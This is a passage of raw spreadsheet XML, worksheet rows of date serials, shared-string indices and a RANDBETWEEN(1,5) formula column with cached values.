      <c r="C28385" t="s">
        <v>41</v>
      </c>
      <c r="E28385" t="s">
        <v>25858</v>
      </c>
      <c r="F28385">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28386" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28386" s="1">
        <v>42851.267395833333</v>
      </c>
      <c r="C28386" t="s">
        <v>65</v>
      </c>
      <c r="E28386" s="2" t="s">
        <v>25859</v>
      </c>
      <c r="F28386">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28387" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28387" s="1">
        <v>42851.264780092592</v>
      </c>
      <c r="C28387" t="s">
        <v>173</v>
      </c>
      <c r="E28387" s="2" t="s">
        <v>25860</v>
      </c>
      <c r="F28387">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28388" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28388" s="1">
        <v>42851.213784722226</v>
      </c>
      <c r="C28388" t="s">
        <v>71</v>
      </c>
      <c r="E28388" s="2" t="s">
        <v>25861</v>
      </c>
      <c r="F28388">
        <f t="shared" ca="1" si="443"/>
        <v>2</v>
      </c>
    </row>
    <row r="28389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28389" s="1">
        <v>42851.199618055558</v>
      </c>
      <c r="C28389" t="s">
        <v>48</v>
      </c>
      <c r="E28389" t="s">
        <v>25862</v>
      </c>
      <c r="F28389">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28390" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28390" s="1">
        <v>42851.179039351853</v>
      </c>
      <c r="C28390" t="s">
        <v>71</v>
      </c>
      <c r="E28390" s="2" t="s">
        <v>25863</v>
      </c>
      <c r="F28390">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28391" s="1">
        <v>42851.15693287037</v>
      </c>
      <c r="C28391" t="s">
        <v>41</v>
      </c>
      <c r="E28391" t="s">
        <v>25864</v>
      </c>
      <c r="F28391">
        <f t="shared" ca="1" si="443"/>
        <v>5</v>
      </c>
    </row>
    <row r="28392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28392" s="1">
        <v>42851.095486111109</v>
      </c>
      <c r="C28392" t="s">
        <v>318</v>
      </c>
      <c r="E28392" t="s">
        <v>25865</v>
      </c>
      <c r="F28392">
        <f t="shared" ca="1" si="443"/>
        <v>2</v>
      </c>
    </row>
    <row r="28393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28393" s="1">
        <v>42850.965150462966</v>
      </c>
      <c r="C28393" t="s">
        <v>410</v>
      </c>
      <c r="E28393" t="s">
        <v>25866</v>
      </c>
      <c r="F28393">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28394" s="1">
        <v>42850.94326388889</v>
      </c>
      <c r="C28394" t="s">
        <v>10</v>
      </c>
      <c r="D28394" t="s">
        <v>6</v>
      </c>
      <c r="E28394" t="s">
        <v>25867</v>
      </c>
      <c r="F28394">
        <f t="shared" ca="1" si="443"/>
        <v>5</v>
      </c>
    </row>
    <row r="28395" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28395" s="1">
        <v>42850.824652777781</v>
      </c>
      <c r="C28395" t="s">
        <v>10</v>
      </c>
      <c r="D28395" t="s">
        <v>36</v>
      </c>
      <c r="E28395" t="s">
        <v>25868</v>
      </c>
      <c r="F28395">
        <f t="shared" ca="1" si="443"/>
        <v>4</v>
      </c>
    </row>
    <row r="28396" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28396" s="1">
        <v>42850.820717592593</v>
      </c>
      <c r="C28396" t="s">
        <v>6</v>
      </c>
      <c r="D28396" t="s">
        <v>821</v>
      </c>
      <c r="E28396" s="2" t="s">
        <v>25869</v>
      </c>
      <c r="F28396">
        <f t="shared" ca="1" si="443"/>
        <v>4</v>
      </c>
    </row>
    <row r="28397" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28397" s="1">
        <v>42850.813032407408</v>
      </c>
      <c r="C28397" t="s">
        <v>6</v>
      </c>
      <c r="D28397" t="s">
        <v>25</v>
      </c>
      <c r="F28397">
        <f t="shared" ca="1" si="443"/>
        <v>3</v>
      </c>
    </row>
    <row r="28398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28398" s="1">
        <v>42850.764618055553</v>
      </c>
      <c r="C28398" t="s">
        <v>10</v>
      </c>
      <c r="D28398" t="s">
        <v>36</v>
      </c>
      <c r="F28398">
        <f t="shared" ca="1" si="443"/>
        <v>5</v>
      </c>
    </row>
    <row r="28399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28399" s="1">
        <v>42850.748553240737</v>
      </c>
      <c r="C28399" t="s">
        <v>6</v>
      </c>
      <c r="D28399" t="s">
        <v>114</v>
      </c>
      <c r="E28399" t="s">
        <v>25870</v>
      </c>
      <c r="F28399">
        <f t="shared" ca="1" si="443"/>
        <v>3</v>
      </c>
    </row>
    <row r="28400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28400" s="1">
        <v>42850.705925925926</v>
      </c>
      <c r="C28400" t="s">
        <v>10</v>
      </c>
      <c r="D28400" t="s">
        <v>163</v>
      </c>
      <c r="E28400" t="s">
        <v>25871</v>
      </c>
      <c r="F28400">
        <f t="shared" ca="1" si="443"/>
        <v>4</v>
      </c>
    </row>
    <row r="28401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28401" s="1">
        <v>42850.691076388888</v>
      </c>
      <c r="C28401" t="s">
        <v>10</v>
      </c>
      <c r="D28401" t="s">
        <v>41</v>
      </c>
      <c r="E28401" t="s">
        <v>25872</v>
      </c>
      <c r="F28401">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28402" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A28402" s="1">
        <v>42850.676377314812</v>
      </c>
      <c r="C28402" t="s">
        <v>48</v>
      </c>
      <c r="E28402" s="2" t="s">
        <v>25873</v>
      </c>
      <c r="F28402">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28403" s="1">
        <v>42850.675787037035</v>
      </c>
      <c r="C28403" t="s">
        <v>48</v>
      </c>
      <c r="F28403">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28404" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28404" s="1">
        <v>42850.617719907408</v>
      </c>
      <c r="C28404" t="s">
        <v>10</v>
      </c>
      <c r="D28404" t="s">
        <v>6</v>
      </c>
      <c r="E28404" s="2" t="s">
        <v>25874</v>
      </c>
      <c r="F28404">
        <f t="shared" ca="1" si="443"/>
        <v>4</v>
      </c>
    </row>
    <row r="28405" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28405" s="1">
        <v>42850.613067129627</v>
      </c>
      <c r="C28405" t="s">
        <v>10</v>
      </c>
      <c r="D28405" t="s">
        <v>6</v>
      </c>
      <c r="E28405" t="s">
        <v>25875</v>
      </c>
      <c r="F28405">
        <f t="shared" ca="1" si="443"/>
        <v>3</v>
      </c>
    </row>
    <row r="28406" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28406" s="1">
        <v>42850.611747685187</v>
      </c>
      <c r="C28406" t="s">
        <v>10</v>
      </c>
      <c r="D28406" t="s">
        <v>158</v>
      </c>
      <c r="E28406" t="s">
        <v>25876</v>
      </c>
      <c r="F28406">
        <f t="shared" ca="1" si="443"/>
        <v>2</v>
      </c>
    </row>
    <row r="28407" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28407" s="1">
        <v>42850.606828703705</v>
      </c>
      <c r="C28407" t="s">
        <v>10</v>
      </c>
      <c r="D28407" t="s">
        <v>52</v>
      </c>
      <c r="E28407" s="2" t="s">
        <v>25877</v>
      </c>
      <c r="F28407">
        <f t="shared" ca="1" si="443"/>
        <v>3</v>
      </c>
    </row>
    <row r="28408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28408" s="1">
        <v>42850.596435185187</v>
      </c>
      <c r="C28408" t="s">
        <v>10</v>
      </c>
      <c r="D28408" t="s">
        <v>6</v>
      </c>
      <c r="E28408" t="s">
        <v>25878</v>
      </c>
      <c r="F28408">
        <f t="shared" ca="1" si="443"/>
        <v>3</v>
      </c>
    </row>
    <row r="28409" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28409" s="1">
        <v>42850.591238425928</v>
      </c>
      <c r="C28409" t="s">
        <v>16</v>
      </c>
      <c r="E28409" t="s">
        <v>25879</v>
      </c>
      <c r="F28409">
        <f t="shared" ca="1" si="443"/>
        <v>1</v>
      </c>
    </row>
    <row r="28410" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28410" s="1">
        <v>42850.566874999997</v>
      </c>
      <c r="C28410" t="s">
        <v>10</v>
      </c>
      <c r="D28410" t="s">
        <v>158</v>
      </c>
      <c r="E28410" t="s">
        <v>25880</v>
      </c>
      <c r="F28410">
        <f t="shared" ca="1" si="443"/>
        <v>4</v>
      </c>
    </row>
    <row r="28411" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28411" s="1">
        <v>42850.563287037039</v>
      </c>
      <c r="C28411" t="s">
        <v>10</v>
      </c>
      <c r="D28411" t="s">
        <v>6</v>
      </c>
      <c r="E28411" s="2" t="s">
        <v>25881</v>
      </c>
      <c r="F28411">
        <f t="shared" ca="1" si="443"/>
        <v>5</v>
      </c>
    </row>
    <row r="28412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28412" s="1">
        <v>42850.558969907404</v>
      </c>
      <c r="C28412" t="s">
        <v>10</v>
      </c>
      <c r="D28412" t="s">
        <v>36</v>
      </c>
      <c r="E28412" t="s">
        <v>25882</v>
      </c>
      <c r="F28412">
        <f t="shared" ca="1" si="443"/>
        <v>5</v>
      </c>
    </row>
    <row r="28413" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28413" s="1">
        <v>42850.545740740738</v>
      </c>
      <c r="C28413" t="s">
        <v>10</v>
      </c>
      <c r="D28413" t="s">
        <v>6</v>
      </c>
      <c r="E28413" t="s">
        <v>25883</v>
      </c>
      <c r="F28413">
        <f t="shared" ca="1" si="443"/>
        <v>2</v>
      </c>
    </row>
    <row r="28414" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28414" s="1">
        <v>42850.545590277776</v>
      </c>
      <c r="C28414" t="s">
        <v>10</v>
      </c>
      <c r="D28414" t="s">
        <v>14</v>
      </c>
      <c r="E28414" t="s">
        <v>25884</v>
      </c>
      <c r="F28414">
        <f t="shared" ca="1" si="443"/>
        <v>5</v>
      </c>
    </row>
    <row r="28415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28415" s="1">
        <v>42850.541203703702</v>
      </c>
      <c r="C28415" t="s">
        <v>10</v>
      </c>
      <c r="D28415" t="s">
        <v>330</v>
      </c>
      <c r="E28415" t="s">
        <v>25885</v>
      </c>
      <c r="F28415">
        <f t="shared" ca="1" si="443"/>
        <v>2</v>
      </c>
    </row>
    <row r="28416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28416" s="1">
        <v>42850.535543981481</v>
      </c>
      <c r="C28416" t="s">
        <v>10</v>
      </c>
      <c r="D28416" t="s">
        <v>94</v>
      </c>
      <c r="E28416" t="s">
        <v>25886</v>
      </c>
      <c r="F28416">
        <f t="shared" ca="1" si="443"/>
        <v>2</v>
      </c>
    </row>
    <row r="28417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28417" s="1">
        <v>42850.529050925928</v>
      </c>
      <c r="C28417" t="s">
        <v>16</v>
      </c>
      <c r="E28417" t="s">
        <v>25887</v>
      </c>
      <c r="F28417">
        <f t="shared" ca="1" si="443"/>
        <v>2</v>
      </c>
    </row>
    <row r="28418" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28418" s="1">
        <v>42850.515659722223</v>
      </c>
      <c r="C28418" t="s">
        <v>10</v>
      </c>
      <c r="D28418" t="s">
        <v>11</v>
      </c>
      <c r="E28418" s="2" t="s">
        <v>25888</v>
      </c>
      <c r="F28418">
        <f t="shared" ref="F28418:F28481" ca="1" si="444">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="28419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28419" s="1">
        <v>42850.470335648148</v>
      </c>
      <c r="C28419" t="s">
        <v>48</v>
      </c>
      <c r="E28419" t="s">
        <v>25889</v>
      </c>
      <c r="F28419">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28420" s="1">
        <v>42850.449675925927</v>
      </c>
      <c r="C28420" t="s">
        <v>1325</v>
      </c>
      <c r="E28420" t="s">
        <v>25890</v>
      </c>
      <c r="F28420">
        <f t="shared" ca="1" si="444"/>
        <v>5</v>
      </c>
    </row>
    <row r="28421" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28421" s="1">
        <v>42850.413055555553</v>
      </c>
      <c r="C28421" t="s">
        <v>173</v>
      </c>
      <c r="E28421" s="2" t="s">
        <v>25891</v>
      </c>
      <c r="F28421">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28422" s="1">
        <v>42850.407418981478</v>
      </c>
      <c r="C28422" t="s">
        <v>10</v>
      </c>
      <c r="D28422" t="s">
        <v>192</v>
      </c>
      <c r="E28422" t="s">
        <v>25892</v>
      </c>
      <c r="F28422">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28423" s="1">
        <v>42850.394849537035</v>
      </c>
      <c r="C28423" t="s">
        <v>10</v>
      </c>
      <c r="D28423" t="s">
        <v>41</v>
      </c>
      <c r="E28423" t="s">
        <v>25893</v>
      </c>
      <c r="F28423">
        <f t="shared" ca="1" si="444"/>
        <v>1</v>
      </c>
    </row>
    <row r="28424" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28424" s="1">
        <v>42850.394293981481</v>
      </c>
      <c r="C28424" t="s">
        <v>222</v>
      </c>
      <c r="E28424" s="2" t="s">
        <v>25894</v>
      </c>
      <c r="F28424">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28425" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28425" s="1">
        <v>42850.392939814818</v>
      </c>
      <c r="C28425" t="s">
        <v>222</v>
      </c>
      <c r="E28425" s="2" t="s">
        <v>25895</v>
      </c>
      <c r="F28425">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28426" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28426" s="1">
        <v>42850.392048611109</v>
      </c>
      <c r="C28426" t="s">
        <v>48</v>
      </c>
      <c r="E28426" s="2" t="s">
        <v>25896</v>
      </c>
      <c r="F28426">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28427" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28427" s="1">
        <v>42850.389537037037</v>
      </c>
      <c r="C28427" t="s">
        <v>6</v>
      </c>
      <c r="D28427" t="s">
        <v>25</v>
      </c>
      <c r="E28427" s="2" t="s">
        <v>25897</v>
      </c>
      <c r="F28427">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28428" s="1">
        <v>42850.388009259259</v>
      </c>
      <c r="C28428" t="s">
        <v>97</v>
      </c>
      <c r="E28428" t="s">
        <v>25898</v>
      </c>
      <c r="F28428">
        <f t="shared" ca="1" si="444"/>
        <v>1</v>
      </c>
    </row>
    <row r="28429" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28429" s="1">
        <v>42850.359537037039</v>
      </c>
      <c r="C28429" t="s">
        <v>10</v>
      </c>
      <c r="D28429" t="s">
        <v>17</v>
      </c>
      <c r="E28429" s="2" t="s">
        <v>25899</v>
      </c>
      <c r="F28429">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28430" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28430" s="1">
        <v>42850.357928240737</v>
      </c>
      <c r="C28430" t="s">
        <v>6230</v>
      </c>
      <c r="E28430" s="2" t="s">
        <v>25900</v>
      </c>
      <c r="F28430">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28431" s="1">
        <v>42850.344652777778</v>
      </c>
      <c r="C28431" t="s">
        <v>10</v>
      </c>
      <c r="D28431" t="s">
        <v>178</v>
      </c>
      <c r="E28431" t="s">
        <v>25901</v>
      </c>
      <c r="F28431">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28432" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28432" s="1">
        <v>42850.32708333333</v>
      </c>
      <c r="C28432" t="s">
        <v>10</v>
      </c>
      <c r="D28432" t="s">
        <v>41</v>
      </c>
      <c r="E28432" t="s">
        <v>25902</v>
      </c>
      <c r="F28432">
        <f t="shared" ca="1" si="444"/>
        <v>5</v>
      </c>
    </row>
    <row r="28433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28433" s="1">
        <v>42850.301203703704</v>
      </c>
      <c r="C28433" t="s">
        <v>410</v>
      </c>
      <c r="E28433" t="s">
        <v>25903</v>
      </c>
      <c r="F28433">
        <f t="shared" ca="1" si="444"/>
        <v>1</v>
      </c>
    </row>
    <row r="28434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28434" s="1">
        <v>42850.238807870373</v>
      </c>
      <c r="C28434" t="s">
        <v>60</v>
      </c>
      <c r="E28434" t="s">
        <v>25904</v>
      </c>
      <c r="F28434">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28435" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28435" s="1">
        <v>42850.226585648146</v>
      </c>
      <c r="C28435" t="s">
        <v>410</v>
      </c>
      <c r="F28435">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28436" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A28436" s="1">
        <v>42850.210416666669</v>
      </c>
      <c r="C28436" t="s">
        <v>1931</v>
      </c>
      <c r="D28436" t="s">
        <v>312</v>
      </c>
      <c r="E28436" s="2" t="s">
        <v>25905</v>
      </c>
      <c r="F28436">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28437" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28437" s="1">
        <v>42850.208668981482</v>
      </c>
      <c r="C28437" t="s">
        <v>1931</v>
      </c>
      <c r="D28437" t="s">
        <v>23</v>
      </c>
      <c r="F28437">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28438" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28438" s="1">
        <v>42850.172233796293</v>
      </c>
      <c r="C28438" t="s">
        <v>1080</v>
      </c>
      <c r="E28438" s="2" t="s">
        <v>25906</v>
      </c>
      <c r="F28438">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28439" s="1">
        <v>42850.160266203704</v>
      </c>
      <c r="C28439" t="s">
        <v>48</v>
      </c>
      <c r="E28439" t="s">
        <v>25907</v>
      </c>
      <c r="F28439">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28440" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28440" s="1">
        <v>42850.127604166664</v>
      </c>
      <c r="C28440" t="s">
        <v>71</v>
      </c>
      <c r="E28440" s="2" t="s">
        <v>25908</v>
      </c>
      <c r="F28440">
        <f t="shared" ca="1" si="444"/>
        <v>5</v>
      </c>
    </row>
    <row r="28441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28441" s="1">
        <v>42849.94903935185</v>
      </c>
      <c r="C28441" t="s">
        <v>41</v>
      </c>
      <c r="E28441" t="s">
        <v>25909</v>
      </c>
      <c r="F28441">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28442" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28442" s="1">
        <v>42849.888298611113</v>
      </c>
      <c r="C28442" t="s">
        <v>6</v>
      </c>
      <c r="D28442" t="s">
        <v>25</v>
      </c>
      <c r="E28442" s="2" t="s">
        <v>25910</v>
      </c>
      <c r="F28442">
        <f t="shared" ca="1" si="444"/>
        <v>1</v>
      </c>
    </row>
    <row r="28443" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A28443" s="1">
        <v>42849.812534722223</v>
      </c>
      <c r="C28443" t="s">
        <v>10</v>
      </c>
      <c r="D28443" t="s">
        <v>20</v>
      </c>
      <c r="E28443" s="2" t="s">
        <v>25911</v>
      </c>
      <c r="F28443">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28444" s="1">
        <v>42849.80300925926</v>
      </c>
      <c r="C28444" t="s">
        <v>10</v>
      </c>
      <c r="D28444" t="s">
        <v>6</v>
      </c>
      <c r="E28444" t="s">
        <v>25912</v>
      </c>
      <c r="F28444">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28445" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A28445" s="1">
        <v>42849.800312500003</v>
      </c>
      <c r="C28445" t="s">
        <v>10</v>
      </c>
      <c r="D28445" t="s">
        <v>20</v>
      </c>
      <c r="E28445" s="2" t="s">
        <v>25911</v>
      </c>
      <c r="F28445">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28446" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28446" s="1">
        <v>42849.767951388887</v>
      </c>
      <c r="C28446" t="s">
        <v>10</v>
      </c>
      <c r="D28446" t="s">
        <v>89</v>
      </c>
      <c r="E28446" s="2" t="s">
        <v>25913</v>
      </c>
      <c r="F28446">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28447" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28447" s="1">
        <v>42849.746400462966</v>
      </c>
      <c r="C28447" t="s">
        <v>10</v>
      </c>
      <c r="D28447" t="s">
        <v>14</v>
      </c>
      <c r="E28447" t="s">
        <v>25914</v>
      </c>
      <c r="F28447">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28448" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A28448" s="1">
        <v>42849.70412037037</v>
      </c>
      <c r="C28448" t="s">
        <v>10</v>
      </c>
      <c r="D28448" t="s">
        <v>46</v>
      </c>
      <c r="E28448" s="2" t="s">
        <v>25915</v>
      </c>
      <c r="F28448">
        <f t="shared" ca="1" si="444"/>
        <v>3</v>
      </c>
    </row>
    <row r="28449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28449" s="1">
        <v>42849.676342592589</v>
      </c>
      <c r="C28449" t="s">
        <v>10</v>
      </c>
      <c r="D28449" t="s">
        <v>178</v>
      </c>
      <c r="E28449" t="s">
        <v>25916</v>
      </c>
      <c r="F28449">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28450" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A28450" s="1">
        <v>42849.672418981485</v>
      </c>
      <c r="C28450" t="s">
        <v>140</v>
      </c>
      <c r="D28450" t="s">
        <v>197</v>
      </c>
      <c r="E28450" s="2" t="s">
        <v>25917</v>
      </c>
      <c r="F28450">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28451" s="1">
        <v>42849.665983796294</v>
      </c>
      <c r="C28451" t="s">
        <v>10</v>
      </c>
      <c r="D28451" t="s">
        <v>20</v>
      </c>
      <c r="E28451" t="s">
        <v>25918</v>
      </c>
      <c r="F28451">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28452" s="1">
        <v>42849.663090277776</v>
      </c>
      <c r="C28452" t="s">
        <v>16</v>
      </c>
      <c r="E28452" t="s">
        <v>25919</v>
      </c>
      <c r="F28452">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28453" s="1">
        <v>42849.626643518517</v>
      </c>
      <c r="C28453" t="s">
        <v>10</v>
      </c>
      <c r="D28453" t="s">
        <v>107</v>
      </c>
      <c r="E28453" t="s">
        <v>25920</v>
      </c>
      <c r="F28453">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28454" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28454" s="1">
        <v>42849.625717592593</v>
      </c>
      <c r="C28454" t="s">
        <v>10</v>
      </c>
      <c r="D28454" t="s">
        <v>107</v>
      </c>
      <c r="F28454">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28455" s="1">
        <v>42849.625335648147</v>
      </c>
      <c r="C28455" t="s">
        <v>16</v>
      </c>
      <c r="E28455" t="s">
        <v>25921</v>
      </c>
      <c r="F28455">
        <f t="shared" ca="1" si="444"/>
        <v>5</v>
      </c>
    </row>
    <row r="28456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28456" s="1">
        <v>42849.588854166665</v>
      </c>
      <c r="C28456" t="s">
        <v>10</v>
      </c>
      <c r="D28456" t="s">
        <v>41</v>
      </c>
      <c r="E28456" t="s">
        <v>25922</v>
      </c>
      <c r="F28456">
        <f t="shared" ca="1" si="444"/>
        <v>1</v>
      </c>
    </row>
    <row r="28457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28457" s="1">
        <v>42849.55746527778</v>
      </c>
      <c r="C28457" t="s">
        <v>6</v>
      </c>
      <c r="D28457" t="s">
        <v>25</v>
      </c>
      <c r="E28457" t="s">
        <v>25923</v>
      </c>
      <c r="F28457">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28458" s="1">
        <v>42849.526458333334</v>
      </c>
      <c r="C28458" t="s">
        <v>10</v>
      </c>
      <c r="D28458" t="s">
        <v>158</v>
      </c>
      <c r="E28458" t="s">
        <v>25924</v>
      </c>
      <c r="F28458">
        <f t="shared" ca="1" si="444"/>
        <v>2</v>
      </c>
    </row>
    <row r="28459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28459" s="1">
        <v>42849.522233796299</v>
      </c>
      <c r="C28459" t="s">
        <v>65</v>
      </c>
      <c r="E28459" t="s">
        <v>25925</v>
      </c>
      <c r="F28459">
        <f t="shared" ca="1" si="444"/>
        <v>1</v>
      </c>
    </row>
    <row r="28460" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28460" s="1">
        <v>42849.521157407406</v>
      </c>
      <c r="C28460" t="s">
        <v>41</v>
      </c>
      <c r="E28460" s="2" t="s">
        <v>25926</v>
      </c>
      <c r="F28460">
        <f t="shared" ca="1" si="444"/>
        <v>1</v>
      </c>
    </row>
    <row r="28461" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28461" s="1">
        <v>42849.521122685182</v>
      </c>
      <c r="C28461" t="s">
        <v>10</v>
      </c>
      <c r="D28461" t="s">
        <v>163</v>
      </c>
      <c r="E28461" s="2" t="s">
        <v>25927</v>
      </c>
      <c r="F28461">
        <f t="shared" ca="1" si="444"/>
        <v>4</v>
      </c>
    </row>
    <row r="28462" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28462" s="1">
        <v>42849.518587962964</v>
      </c>
      <c r="C28462" t="s">
        <v>10</v>
      </c>
      <c r="D28462" t="s">
        <v>6</v>
      </c>
      <c r="E28462" t="s">
        <v>25928</v>
      </c>
      <c r="F28462">
        <f t="shared" ca="1" si="444"/>
        <v>1</v>
      </c>
    </row>
    <row r="28463" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28463" s="1">
        <v>42849.516030092593</v>
      </c>
      <c r="C28463" t="s">
        <v>178</v>
      </c>
      <c r="E28463" s="2" t="s">
        <v>25929</v>
      </c>
      <c r="F28463">
        <f t="shared" ca="1" si="444"/>
        <v>5</v>
      </c>
    </row>
    <row r="28464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28464" s="1">
        <v>42849.508912037039</v>
      </c>
      <c r="C28464" t="s">
        <v>10</v>
      </c>
      <c r="D28464" t="s">
        <v>17</v>
      </c>
      <c r="E28464" t="s">
        <v>25930</v>
